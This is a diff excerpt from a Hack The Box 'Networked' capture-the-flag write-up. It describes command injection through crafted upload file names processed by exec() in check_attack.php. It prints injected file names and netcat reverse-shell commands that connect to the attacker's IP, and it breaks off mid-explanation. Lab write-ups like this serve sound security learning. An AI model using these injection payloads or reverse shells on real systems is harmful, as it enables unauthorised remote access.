7axm1/7axm1.github.io/_posts/2019-11-16-htb-writeup-Networked.md

 ### **Privilege Escalation- guly**
 In the `/home/guly` directory we find a file named `check_attack.php`.
 Let us try to understand what the file does.

 From the program we observe that `$path$value` is called to be deleted when attack observed.
 This is nothing but name of filenames in folder `/var/www/uploads/` with the full path.
-Now, if we can give a command as input to the exec() we can get code execution.
+If we can give a command as input to the exec() we can get to execute that command.
 This requires manupilation of file name to contain the code we need to execute.
 After trying names like `10_10_14_2;nc 10.10.14.2 9000 -e sh.png`, `10_10_14_2;nc 10.10.14.2 9000 -e bash &.png`, I realised that the reverse shell closes immediately.
 I tried doing `nc 10.10.14.2 9000 -e bash`and the same happened.
 Then I tried `nc 10.10.14.2 9000 -e /bin/bash`.
 This time, I got a stable shell !!!
 Oops, how do we give that as file name ???
 I decided to take help of environment variables, checked value of `$SHELL` and found it to be `/sbin/nologin`.